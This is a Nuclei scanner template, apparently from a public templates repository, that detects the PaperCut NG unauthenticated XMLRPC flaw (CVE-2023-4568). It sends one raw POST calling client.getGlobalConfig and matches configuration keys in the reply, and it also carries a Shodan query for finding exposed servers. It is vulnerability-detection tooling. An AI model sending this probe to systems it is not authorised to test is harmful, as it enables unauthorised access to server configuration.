nuclei-templates/http/cves/2023/CVE-2023-4568.yaml

56 lines
1.7 KiB
YAML
Raw Normal View History

2023-09-18 17:36:47 +00:00
id: CVE-2023-4568
info:
name: PaperCut NG Unauthenticated XMLRPC Functionality
author: DhiyaneshDK
severity: medium
description: |
PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-4568
- https://www.tenable.com/security/research/tra-2023-31
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2023-4568
cwe-id: CWE-287
2023-10-14 11:27:55 +00:00
epss-score: 0.00261
epss-percentile: 0.63693
2023-09-18 17:36:47 +00:00
cpe: cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: papercut
product: papercut_ng
shodan-query: html:"content="PaperCut""
tags: cve,cve2023,unauth,papercut
http:
- raw:
- |
POST /rpc/clients/xmlrpc HTTP/1.1
Host: {{Hostname}}
Content-Type:text/xml
<?xml version="1.0"?><methodCall><methodName>client.getGlobalConfig</methodName><params><param><value><string>str1</string></value></param><param><value><string>str2</string></value></param></params></methodCall>
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'conf.ssl-port'
- 'conf.auth-ttl-default'
condition: and
- type: word
part: header
words:
- text/xml
- type: status
status:
- 200
# digest: 490a00463044022079ba2dc6322426adcdbfa018c602f605f38be79e4856eb141f4068a1c4a82269022042c119bd39b22cd2630bbad1bca38a4b740b93f2d7bbd03ef8f76cb07e8154f7:922c64590222798bb761d5b6d8e72950